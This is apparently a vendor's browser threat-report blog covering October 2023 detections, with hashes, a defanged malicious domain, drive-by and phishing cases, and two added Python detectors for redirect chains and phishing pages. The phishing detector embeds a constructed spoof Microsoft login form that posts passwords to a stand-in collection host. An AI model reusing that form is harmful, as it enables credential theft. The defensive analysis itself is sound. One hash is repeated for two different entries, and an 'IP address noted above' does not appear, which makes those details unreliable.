Conceal’s Weekly Threat Reports are highlights of recently detected sites that were deemed suspicious using our AI-powered browser extension, ConcealBrowse.

ConcealBrowse is leveraged by teams across the world to combat weaponized URLs. The technology is constantly analyzing suspicious web artifacts to identify risks in the form of drive-by attacks, phishing portals, and other threats that materialize while browsing.

Browser-Based Threat Report: Week of October 16th, 2023

At Conceal, your digital safety is our utmost priority. Our weekly threat report for the week of October 16th, 2023, unveils critical insights into the ever-evolving landscape of online threats.

The following report highlights recently detected sites that were deemed suspicious:

SHA-256 42a439f1d2c94a9d456fc25fd9ae758fd1a55b1061d4a9ba5e90406424f3f39c

This URL was detected by ConcealBrowse on October 16th, 2023. It was first submitted to a handful of CTI feeds on September 21st, 2023, and was most recently resubmitted for analysis on October 15th, 2023. To date, only four security vendors other than ConcealBrowse have flagged this URL.

The link passes through several plain-HTTP (unencrypted) redirects that lead to gambling sites, spoofed shopping sites, and a suspicious download. More concerning, one branch of the chain lands on a QR code that entices the user to scan it with a mobile device, which is typically less protected than a managed PC or laptop. The QR code leads to another suspicious web page that is already being tracked by CTI feeds.

Additionally, the serving IP address noted above has been observed delivering a W32 trojan variant as recently as October 8th, 2023.
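The redirect chain described above is the kind of thing a practitioner wants to enumerate without loading the pages in a real browser. The script below is an added example, not Conceal's or ConcealBrowse's code: it walks a chain one hop at a time without executing JavaScript, flags plain-HTTP hops, cross-domain jumps, meta-refresh redirects and loops, and notes when the chain terminates in an image, which is where a QR code would normally be served. The hop data in CONSTRUCTED is made up for the demonstration, every hostname under .example is an assumption, and live_fetch is an optional stdlib-only fetcher for use against a real chain.

```python
"""Enumerate an HTTP redirect chain without a browser and flag risky hops.

Added example for illustration; the chain data below is constructed.
"""
import re
from dataclasses import dataclass, field
from typing import Callable, List, Optional, Tuple
from urllib.parse import urljoin, urlsplit

# <meta http-equiv="refresh" content="0;url=..."> is a client-side redirect
# that a header-only check would miss.
META_REFRESH = re.compile(
    r'<meta[^>]+http-equiv=["\']?refresh["\']?[^>]*content=["\']?\s*\d+\s*;\s*url=([^"\'>\s]+)',
    re.IGNORECASE,
)


@dataclass
class Hop:
    url: str
    status: int
    location: Optional[str] = None  # Location header for 3xx responses
    content_type: str = ""
    body: str = ""                  # only scanned for a meta refresh


@dataclass
class ChainReport:
    hops: List[str] = field(default_factory=list)
    findings: List[str] = field(default_factory=list)
    final_url: Optional[str] = None
    final_content_type: str = ""


def registrable_domain(url: str) -> str:
    """Last two host labels; crude, but enough to spot cross-site hops."""
    host = (urlsplit(url).hostname or "").lower()
    labels = host.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host


def next_location(hop: Hop) -> Tuple[Optional[str], str]:
    """Return (absolute next URL, redirect kind), or (None, '') if the hop is final."""
    if 300 <= hop.status < 400 and hop.location:
        return urljoin(hop.url, hop.location), "3xx"
    m = META_REFRESH.search(hop.body)
    if m:
        return urljoin(hop.url, m.group(1)), "meta-refresh"
    return None, ""


def walk_chain(start: str, fetch: Callable[[str], Hop], max_hops: int = 10) -> ChainReport:
    """Follow redirects hop by hop using the supplied fetch function."""
    report = ChainReport()
    seen = set()
    url: Optional[str] = start
    while url is not None:
        if url in seen:
            report.findings.append(f"redirect loop at {url}")
            break
        if len(report.hops) >= max_hops:
            report.findings.append(f"hop limit {max_hops} exceeded")
            break
        seen.add(url)
        report.hops.append(url)
        if urlsplit(url).scheme == "http":
            report.findings.append(f"insecure hop: {url}")
        hop = fetch(url)
        nxt, kind = next_location(hop)
        if nxt is None:
            report.final_url = url
            report.final_content_type = hop.content_type
            break
        if registrable_domain(nxt) != registrable_domain(url):
            report.findings.append(f"cross-domain {kind} redirect: {url} -> {nxt}")
        url = nxt
    if report.final_content_type.startswith("image/"):
        report.findings.append("chain ends in an image; inspect it for a QR code")
    return report


# Constructed chain (hypothetical hosts): an HTTPS short link bounces through a
# plain-HTTP tracker, which meta-refreshes to a PNG on yet another host.
CONSTRUCTED = {
    "https://short.example/abc": Hop("https://short.example/abc", 302, "http://track.example/go?id=1"),
    "http://track.example/go?id=1": Hop(
        "http://track.example/go?id=1", 200, content_type="text/html",
        body='<html><head><meta http-equiv="refresh" content="0;url=http://promo.example/qr.png"></head></html>',
    ),
    "http://promo.example/qr.png": Hop("http://promo.example/qr.png", 200, content_type="image/png"),
}


def fetch_constructed(url: str) -> Hop:
    return CONSTRUCTED[url]


def live_fetch(url: str, timeout: int = 10) -> Hop:
    """Optional network fetcher (stdlib only) that never auto-follows redirects."""
    import urllib.error
    import urllib.request

    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, req, fp, code, msg, headers, newurl):
            return None  # surface the 3xx instead of following it

    try:
        resp = urllib.request.build_opener(NoRedirect).open(url, timeout=timeout)
    except urllib.error.HTTPError as err:
        resp = err  # 3xx/4xx/5xx responses still carry headers and a body
    status = getattr(resp, "status", None) or getattr(resp, "code", 0)
    ctype = resp.headers.get("Content-Type", "")
    body = resp.read(65536).decode("utf-8", "replace") if "text/html" in ctype else ""
    return Hop(url, status, resp.headers.get("Location"), ctype, body)
```

Run walk_chain("https://short.example/abc", fetch_constructed) to see the five findings the constructed chain produces; swap fetch_constructed for live_fetch to walk a real URL, keeping in mind that a live walk fetches every hop from the analyst's own address.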

_____________

SHA-256 18358a77382e2475a5dcc8445ef23a859d1d7cb698d6b31808f76104cf30fbfd

This web page was detected by ConcealBrowse on October 16th, 2023, having first been submitted to CTI feeds on August 3rd, 2019. It reflects a continuing trend: compromised websites belonging to smaller businesses go unremediated for long periods.

During analysis, the site was flagged as malicious by multiple vendors. Further analysis triggered several behavioural signatures, including the creation of files in the system directory.

At the time of analysis, several MITRE ATT&CK techniques were also observed on this site: Masquerading (T1036), Process Injection (T1055), Ingress Tool Transfer (T1105), Encrypted Channel (T1573), Application Layer Protocol (T1071), and Non-Application Layer Protocol (T1095).

_____________

SHA-256 18358a77382e2475a5dcc8445ef23a859d1d7cb698d6b31808f76104cf30fbfd

This currently active URL was detected by ConcealBrowse on October 16th, 2023. It was first submitted to various CTI feeds on August 15th, 2023, and was resubmitted on the morning of October 17th, indicating that the delivered page has been compromised again.

The URL takes users to a seemingly benign page offering a free PDF converter. Clicking "Download Now" downloads the converter and, bundled with it, a malicious dropper. The dropper is a RedLine trojan variant.

_____________

Valuable Outcomes

ConcealBrowse offers comprehensive protection against a myriad of sophisticated cyber threats, as exemplified in recent threat reports. Our advanced threat detection capabilities have successfully flagged and quarantined malicious web pages, preventing users from falling victim to various cyber attacks. Conceal remains dedicated to upholding the integrity of online interactions, constantly refining our detection algorithms and threat identification protocols to ensure proactive protection against emerging cyber threats. By integrating cutting-edge technology and a robust security infrastructure, we empower users to navigate the digital landscape with confidence, knowing that their online activities are shielded from potential harm.

Join the Conceal Community and claim your FREE ConcealBrowse licenses!

Join the Conceal Community today and fortify your online security for free! Don’t miss the chance to benefit from our advanced threat protection and stay one step ahead of cybercriminals. Experience peace of mind while browsing the internet, knowing that ConcealBrowse is your shield against the ever-evolving threat landscape. Take the proactive step towards a safer online experience – get your free ConcealBrowse license now and join a community that’s committed to safeguarding your digital world.


Browser-Based Threat Report: Week of October 2nd, 2023

In today’s digital landscape, threats to online security are ever-evolving, and staying one step ahead of malicious actors is essential. ConcealBrowse is your trusted partner in the battle against cyber threats. Our advanced threat detection and prevention system uncovered a severe security risk on September 20th, 2023, and we have been at the forefront of safeguarding the online experience ever since.

The following report highlights recently detected sites that were deemed suspicious:

This web page was detected by ConcealBrowse on September 20th, 2023, having first been submitted to various CTI feeds on March 20th, 2023. It was resubmitted for analysis on September 21st, 2023, indicating that the page is repeatedly compromised to serve malicious content.

The compromised site was conducting drive-by downloads via embedded JavaScript files, delivering an HTML file with a SHA-256 of 0d3e98ca727fc1201b436170af5a63f23348aaf146a3ac6234f6c4da283e8b34.

The observed MITRE ATT&CK techniques include Defense Evasion via Process Injection (T1055) and Command and Control via Ingress Tool Transfer (T1105). Using these, the adversary can deliver the suspected credential-harvesting HTML file and exfiltrate the credentials the user supplies.

_____________

This web page was detected by ConcealBrowse on September 29th, 2023, having first been submitted to CTI feeds on December 29th, 2015. The page was most recently submitted on September 23rd, 2023, because of its continued malicious activity. The page contains a redirect to hxxp://survey-smiles[.]com, which is delivering an HTML file with a SHA-256 of 10dbbd006c5099d6e4f1302ffb0bd95885c0b4caf4107de725b73c08bdb8a39d.

Upon further analysis of the original URL, it was identified as a URL referenced in the strings of the njRAT-master trojan (SHA-256: c6c2f7f109ce90b2874266c2dfea905bdca745dfac3922d674922de476109d30).

Finally, the hosting IP address has reportedly been contacted by various Win32 executables that redirect victims to a spoofed PayPal page, reinstall adware, and deliver trojans, among other malicious activities. Other URLs hosted on the same IP address are currently delivering malicious payloads and actively phishing.

_____________

This currently active page was detected by ConcealBrowse on September 28th, 2023 with it first being submitted to various CTI feeds later that same day. When the page is loaded, it leads victims to a spoofed Microsoft login page that entices users to divulge their credentials. Fortunately, ConcealBrowse detected the page and not only sent it to isolation, but also prevented the user from entering in their password, as seen below.
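The credential-harvesting HTML file in the first entry of this report and the spoofed Microsoft login page above share the same tells: a password form that submits somewhere other than the page's own origin, a brand name on a host that does not belong to that brand, and inline script that navigates the browser on its own. The checker below is an added example, not ConcealBrowse's detection logic. The two HTML documents and every hostname in it are constructed, and the BRANDS table is a deliberately small assumption you would replace with a maintained list.

```python
"""Heuristic checks for a credential-harvesting (phishing) login page.

Added example; the HTML documents and hostnames below are constructed.
"""
import re
from html.parser import HTMLParser
from typing import Dict, List, Tuple
from urllib.parse import urljoin, urlsplit

# Brand keyword -> domains that legitimately host that brand's login
# (assumed, abbreviated list for the example).
BRANDS: Dict[str, Tuple[str, ...]] = {
    "microsoft": ("microsoft.com", "live.com", "microsoftonline.com"),
    "paypal": ("paypal.com",),
}
# Assignments to location / location.href, or location.replace()/assign().
NAVIGATES = re.compile(r"\blocation(?:\.href)?\s*=[^=]|\blocation\.(?:replace|assign)\(")


class PageParser(HTMLParser):
    """Collect forms (and whether they carry a password field), title, text, scripts."""

    def __init__(self) -> None:
        super().__init__()
        self.forms: List[dict] = []
        self.title = ""
        self.text: List[str] = []
        self.scripts: List[str] = []
        self._form = None
        self._in = ""  # 'title' or 'script' while inside that element

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._form = {"action": a.get("action", ""),
                          "method": (a.get("method") or "get").lower(),
                          "password": False}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None and a.get("type", "").lower() == "password":
            self._form["password"] = True
        elif tag in ("title", "script"):
            self._in = tag

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None
        elif tag == self._in:
            self._in = ""

    def handle_data(self, data):
        if self._in == "title":
            self.title += data
        elif self._in == "script":
            self.scripts.append(data)
        else:
            self.text.append(data)


def host_of(url: str) -> str:
    return (urlsplit(url).hostname or "").lower()


def belongs_to(host: str, domains: Tuple[str, ...]) -> bool:
    return any(host == d or host.endswith("." + d) for d in domains)


def assess(page_url: str, html: str) -> List[str]:
    """Return a list of findings; an empty list means nothing suspicious was seen."""
    p = PageParser()
    p.feed(html)
    page_host = host_of(page_url)
    findings: List[str] = []
    for f in p.forms:
        if not f["password"]:
            continue
        action = urljoin(page_url, f["action"]) if f["action"] else page_url
        if f["method"] != "post":
            findings.append("password form submits via GET (credentials end up in the URL)")
        if urlsplit(action).scheme == "http":
            findings.append(f"password form posts over plaintext HTTP to {action}")
        if host_of(action) != page_host:
            findings.append(f"password form posts off-origin to {host_of(action)}")
    corpus = (p.title + " " + " ".join(p.text)).lower()
    for brand, domains in BRANDS.items():
        if brand in corpus and not belongs_to(page_host, domains):
            findings.append(f"page mentions {brand} but is hosted on {page_host}")
    if any(NAVIGATES.search(s) for s in p.scripts):
        findings.append("inline script navigates the browser after load")
    return findings


# Constructed spoof: Microsoft branding on an unrelated host, posting elsewhere.
SPOOF_URL = "https://account-verify.example/login.html"
SPOOF_HTML = """<html><head><title>Sign in to your Microsoft account</title></head>
<body><form method="post" action="https://collect.example/post.php">
<input name="login" type="email"><input name="passwd" type="password">
<button>Sign in</button></form>
<script>setTimeout(function(){window.location.href="https://collect.example/done"},2000)</script>
</body></html>"""

# Constructed benign page: same brand, legitimate host, same-origin POST.
BENIGN_URL = "https://login.microsoftonline.com/common/oauth2/authorize"
BENIGN_HTML = """<html><head><title>Sign in to your Microsoft account</title></head>
<body><form method="post" action="/common/login">
<input name="login" type="email"><input name="passwd" type="password">
</form></body></html>"""
```

assess(SPOOF_URL, SPOOF_HTML) returns three findings and assess(BENIGN_URL, BENIGN_HTML) returns none. These are signals, not a verdict: a legitimate site may post its login to a separate auth host, which is why an isolation-and-block decision like the one described above belongs in a system that can weigh several such signals against reputation data.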

_____________

Join us today, and together, let’s make the internet a safer place.